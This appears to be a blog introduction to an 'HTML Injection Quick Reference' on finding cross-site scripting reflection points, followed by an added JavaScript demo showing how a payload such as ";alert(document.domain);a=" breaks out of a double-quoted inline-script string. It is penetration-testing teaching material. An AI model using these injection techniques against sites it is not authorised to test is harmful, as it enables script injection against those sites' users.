HTML Injection Quick Reference
I often refer to Cross-Site Scripting (XSS) as HTML Injection. This HTML Injection Quick Reference (HIQR) describes some of the common techniques used to manipulate the HTML, and therefore the DOM, of a web app. This article introduces the reference.
In the examples below, the biohazard symbol (U+2623) – ☣ – represents the exploit at the heart of the payload. Some common payloads to demonstrate JavaScript execution might be:
- alert(document.domain) – The ubiquitous pop-up. But extremely annoying to have to click through, especially if it fires more than once.
- console.log(document.domain) – A friendlier version of alert that will trigger messages in the browser’s JavaScript console. This doesn’t interfere with the UX in the way that the interrupting pop-ups from alert will.
But this reference isn’t about how to exploit XSS vulns. It’s about how to find XSS vulns and refine the syntax needed to make a payload successfully execute.
The reference is about a methodology for finding HTML injection vulns and wrapping payloads in just the right characters to avoid JavaScript warnings or errors. Good exploits take advantage of HTML syntax or use browser quirks in creative ways.
Take the time to experiment with simple payloads and observe how (and where) the web app reflects them. Once you have a reflection point, try payloads based on the techniques below.
Note how the syntax of elements and JavaScript has been preserved in cases where a single- or double-quote is used to prefix a payload. The injected quote prematurely ends the quoted string the reflection point sits in, which means the string’s original closing quote is left dangling at the end.
Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:
;a="
The dangling quote closes the delimiter and, in most cases, preserves the original syntax. This type of closure isn’t always necessary for an exploit to succeed, but it’s a fun exercise.
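The closure in action, as an added example that is not part of the HIQR reference or its author’s code. It assumes a hypothetical inline script template, var q = "REFLECT"; doSearch(q);, whose quoted value is the reflection point, and uses new Function with stubbed alert, document and doSearch so the reflected script can be compiled and run offline in Node. The stub names, the example.test domain, and the extra a parameter (which keeps the closure’s a="" assignment local) are all assumptions.

```javascript
// Added example (not from the HIQR page): why the trailing ;a=" matters when a
// payload lands inside a double-quoted JavaScript string.

// Hypothetical server-side template: the reflection point is the value of a
// quoted string inside an inline <script> block.
const TEMPLATE = 'var q = "REFLECT"; doSearch(q);';

// Script the browser would receive for a given reflected value.
function reflect(value) {
  return TEMPLATE.replace('REFLECT', value);
}

// The exploit body the reference marks with the biohazard symbol.
const EXPLOIT = 'alert(document.domain)';

// Naive payload: the leading quote ends the string, but the template's own
// closing quote is left dangling and the script never parses.
const NAIVE = '";' + EXPLOIT;

// Closed payload: ;a=" opens a second string that swallows the dangling quote.
const CLOSED = '";' + EXPLOIT + ';a="';

// Wrong delimiter: single quotes inside a double-quoted string are just data.
const WRONG_QUOTE = "';" + EXPLOIT + ";a='";

// Compile and run a reflected script with stubs in place of the browser
// globals, so the result is observable without a real page.
function run(src) {
  const calls = [];                              // what alert() was called with
  const stubAlert = (msg) => calls.push(String(msg));
  const stubDocument = { domain: 'example.test' }; // constructed, not real
  const noop = () => {};
  try {
    // alert/document/doSearch are bound as parameters; a is a parameter too so
    // the closure's a="" assignment does not create a global in sloppy mode.
    const fn = new Function('alert', 'document', 'doSearch', 'a', src);
    fn(stubAlert, stubDocument, noop, undefined);
    return { syntaxOk: true, fired: calls.length > 0, calls };
  } catch (e) {
    // new Function() throws SyntaxError at construction time for bad source.
    if (e instanceof SyntaxError) return { syntaxOk: false, fired: false, calls };
    throw e;
  }
}

// Run all three payloads through the same reflection point.
function demo() {
  return {
    naive: { src: reflect(NAIVE), ...run(reflect(NAIVE)) },
    closed: { src: reflect(CLOSED), ...run(reflect(CLOSED)) },
    wrongQuote: { src: reflect(WRONG_QUOTE), ...run(reflect(WRONG_QUOTE)) },
  };
}

// Stand-alone usage: print each reflected script and whether the exploit ran.
for (const [name, r] of Object.entries(demo())) {
  console.log(name, '| syntaxOk:', r.syntaxOk, '| fired:', r.fired, '|', r.src);
}
```

The third case is the one worth remembering when refining a payload: a single-quote payload against a double-quoted reflection point compiles cleanly but stays inert inside the string, so a reflected page that throws no JavaScript error is not the same as a payload that executes. Match the delimiter the reflection point actually uses, then close it.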
Here are some additional blog posts on HTML injection:
- Bad Code Entitles Good Exploits
- Selector the Almighty, Subjugator of Elements
- A Default Base of XSS
- On a Path to HTML Injection
- DRY Fiend (Conjuration/Summoning)
- Two Hearts That Beat As One
- A True XSS That Needs To Be False
- The Wrong Location for a Locale
- Insistently Marketing Persistent XSS
- Implicit HTML, Explicit Injection
- Escape from Normality
To more easily review the examples below, check out the HIQR project page.